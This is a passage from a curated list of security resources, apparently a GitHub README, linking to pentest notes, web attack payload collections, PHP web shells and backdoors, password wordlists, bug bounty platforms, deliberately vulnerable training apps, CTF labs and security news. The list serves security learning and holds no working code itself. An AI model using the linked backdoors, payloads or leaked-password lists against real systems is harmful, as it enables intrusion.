<b><code>&nbsp;&nbsp;&nbsp;801🍴</code></b> <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5323⭐</code></b> <b><code>&nbsp;&nbsp;1514🍴</code></b> <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a></a> - notes for beginner network pentesting course.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2335⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;744🍴</code></b> <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;49887⭐</code></b> <b><code>&nbsp;13024🍴</code></b> <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3365⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;990🍴</code></b> <a href="https://github.com/foospidy/payloads"><b>payloads</b></a></a> - git all the Payloads! A collection of web attack payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2166⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;513🍴</code></b> <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a></a> - command injection payload list.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4364⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;724🍴</code></b> <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>Awesome Shodan Search Queries</b></a></a> - great search queries to plug into Shodan.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4467⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;761🍴</code></b> <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a></a> - is a collection of Awesome XSS resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1799⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;800🍴</code></b> <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a></a> - common php webshells.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/">🌎 <b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheatsheetseries.owasp.org/">🌎 <b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jeremylong.github.io/DependencyCheck/index.html">🌎 <b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls">🌎 <b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;12275⭐</code></b> <b><code>&nbsp;&nbsp;2300🍴</code></b> <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a></a> - hacking & penetration testing & red team & cyber security resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3129⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;911🍴</code></b> <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a></a> - is a free online security knowledge library for pentesters/researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://media.defcon.org/">🌎 <b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10138⭐</code></b> <b><code>&nbsp;&nbsp;2455🍴</code></b> <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a></a> - a curated list of awesome malware analysis tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/">🌎 <b>SQL Injection Cheat Sheet</b></a> - detailed technical stuff about the many different variants of the SQL Injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtfobins.github.io/">🌎 <b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://guif.re/">🌎 <b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;460⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;98🍴</code></b> <a href="https://github.com/bl4de/ctf"><b>ctf</b></a></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2512⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;485🍴</code></b> <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a></a> - collection of CTF Web challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10560⭐</code></b> <b><code>&nbsp;&nbsp;2190🍴</code></b> <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a></a> - notes on the most common things for an Internal Network Penetration Test.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3960⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;892🍴</code></b> <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;142⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;27🍴</code></b> <a href="https://github.com/securitum/research"><b>securitum/research</b></a></a> - various Proof of Concepts of security research performed by Securitum.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7481⭐</code></b> <b><code>&nbsp;&nbsp;1811🍴</code></b> <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a></a> - is a list of public pentest reports released by several consulting security groups.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3987⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;884🍴</code></b> <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a></a> - is a comprehensive curated list of available Bug Bounty.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3441⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;987🍴</code></b> <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a></a> - is a list of bug bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3886⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;897🍴</code></b> <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a></a> - is a curated list of bugbounty writeups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentester.land/list-of-bug-bounty-writeups.html">🌎 <b>Bug bounty writeups</b></a> - list of bug bounty writeups (2012-2020).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackso.me/">🌎 <b>hackso.me</b></a> - a great journey into security.<br> </p> ##### :black_small_square: Backdoors/exploits <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2151⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;511🍴</code></b> <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a></a> - a collection of PHP backdoors. For educational or testing purposes only.<br> </p> ##### :black_small_square: Wordlists and Weak passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weakpass.com/">🌎 <b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashes.org/">🌎 <b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;48353⭐</code></b> <b><code>&nbsp;23155🍴</code></b> <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a></a> - collection of multiple types of lists used during security assessments, collected in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8075⭐</code></b> <b><code>&nbsp;&nbsp;1611🍴</code></b> <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a></a> - sorted by probability originally created for password generation and testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.skullsecurity.org/index.php?title=Passwords">🌎 <b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist">🌎 <b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;682⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;109🍴</code></b> <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a></a> - wordlists for creating statistically likely username lists.<br> </p> ##### :black_small_square: Bounty platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.yeswehack.com/">🌎 <b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbugbounty.org/">🌎 <b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackerone.com/">🌎 <b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.bugcrowd.com/">🌎 <b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crowdshield.com/">🌎 <b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.synack.com/">🌎 <b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacktrophy.com/en/">🌎 <b>Hacktrophy</b></a> - bug bounty platform.<br> </p> ##### :black_small_square: Web Training Apps (local installation) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project">🌎 <b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2">🌎 <b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4203⭐</code></b> <b><code>&nbsp;&nbsp;1083🍴</code></b> <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;707⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;267🍴</code></b> <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sourceforge.net/projects/mutillidae/">🌎 <b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project">🌎 <b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project">🌎 <b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web apps developed using Node.js.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;217⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;94🍴</code></b> <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1193⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;433🍴</code></b> <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a></a> - web and mobile application security training platform.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;200⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;61🍴</code></b> <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a></a> - open source application security training program.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;933⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;319🍴</code></b> <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a></a> - a modern vulnerable web app.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;628⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;554🍴</code></b> <a href="https://github.com/appsecco/dvna"><b>dvna</b></a></a> - damn vulnerable NodeJS application.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2978⭐</code></b> <b><code>&nbsp;&nbsp;1361🍴</code></b> <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a></a> - is an open-source application vulnerability correlation and security orchestration tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google-gruyere.appspot.com/">🌎 <b>Google Gruyere</b></a> - web application exploits and defenses.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;110⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;18🍴</code></b> <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://websploit.h4cker.org/">🌎 <b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;14625⭐</code></b> <b><code>&nbsp;&nbsp;4164🍴</code></b> <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a></a> - pre-built Vulnerable Environments based on docker-compose.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/">🌎 <b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design" AWS deployment tool.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;800⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;368🍴</code></b> <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a></a> - is a laboratory for learning secure web development in a practical manner.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;175⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;37🍴</code></b> <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a></a> - sample vulnerable code and its exploit code.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;791⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;278🍴</code></b> <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://application.security/">🌎 <b>KONTRA</b></a> - application security training (OWASP Top Web & Api).<br> </p> ##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.offensive-security.com/">🌎 <b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthebox.eu/">🌎 <b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacking-lab.com/index.html">🌎 <b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pwnable.tw/">🌎 <b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://picoctf.com/">🌎 <b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctflearn.com/">🌎 <b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctftime.org/">🌎 <b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://silesiasecuritylab.com/">🌎 <b>Silesia Security Lab</b></a> - high quality security testing services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://practicalpentestlabs.com/">🌎 <b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.root-me.org/?lang=en">🌎 <b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rozwal.to/login">🌎 <b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tryhackme.com/">🌎 <b>TryHackMe</b></a> - learning Cyber Security made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackxor.net/">🌎 <b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.wizard-security.net/">🌎 <b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentesterlab.com/">🌎 <b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/">🌎 <b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ubeeri.com/preconfig-labs">🌎 <b>Ubeeri</b></a> - preconfigured lab environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lab.pentestit.ru/">🌎 <b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving pentest skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://microcorruption.com/login">🌎 <b>Microcorruption</b></a> - reversal challenges done in the web interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crackmes.one/">🌎 <b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://domgo.at/cxss/intro">🌎 <b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chall.stypr.com">🌎 <b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulnhub.com/">🌎 <b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://w3challs.com/">🌎 <b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/challenges">🌎 <b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hack.me/">🌎 <b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational purposes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthis.co.uk/levels/">🌎 <b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enigmagroup.org/#">🌎 <b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://challenges.re/">🌎 <b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0x00sec.org/">🌎 <b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wechall.net/challs">🌎 <b>We Chall</b></a> - there are exist a lots of different challenge types.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackergateway.com/">🌎 <b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacker101.com/">🌎 <b>Hacker101</b></a> - is a free class for web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://contained.af/">🌎 <b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybersecurity.wtf">🌎 <b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctfchallenge.co.uk/login">🌎 <b>CTF Challenge</b></a> - CTF Web App challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://capturetheflag.withgoogle.com">🌎 <b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthissite.org/pages/index/index.php">🌎 <b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://attackdefense.com">🌎 <b>Attack & Defense</b></a> - is a browser-based cloud labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptohack.org/">🌎 <b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptopals.com/">🌎 <b>Cryptopals</b></a> - the cryptopals crypto challenges.<br> </p> ##### :black_small_square: CTF platforms <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6493⭐</code></b> <b><code>&nbsp;&nbsp;1360🍴</code></b> <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a></a> - platform to host Capture the Flag competitions.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;161⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;69🍴</code></b> <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a></a> - scoreboard for Capture The Flag competitions.<br> </p> ##### :black_small_square: Other resources <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2436⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;544🍴</code></b> <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a></a> - open source education content for the researcher community.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2335⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;744🍴</code></b> <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5">🌎 <b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4964⭐</code></b> <b><code>&nbsp;&nbsp;1236🍴</code></b> <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a></a> - compilation of resources from TCM's Udemy Course.<br> </p> #### Your daily knowledge and news &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: RSS Readers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://feedly.com/">🌎 <b>Feedly</b></a> - organize, read and share what matters to you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.inoreader.com/">🌎 <b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br> </p> ##### :black_small_square: IRC Channels <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.hackerspaces.org/IRC_Channel">🌎 <b>#hackerspaces</b></a> - hackerspace IRC channels.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thehackernews.com/">🌎 <b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://latesthackingnews.com/">🌎 <b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitynewsletter.co/">🌎 <b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.googleblog.com/">🌎 <b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.qualys.com/">🌎 <b>Qualys Blog</b></a> - expert network security guidance and news.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darkreading.com/">🌎 <b>DARKReading</b></a> - connecting the Information Security Community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darknet.org.uk/">🌎 <b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/disclosedh1">🌎 <b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.reddit.com/r/hacking/">🌎 <b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetstormsecurity.com/">🌎 <b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sekurak.pl/">🌎 <b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br> 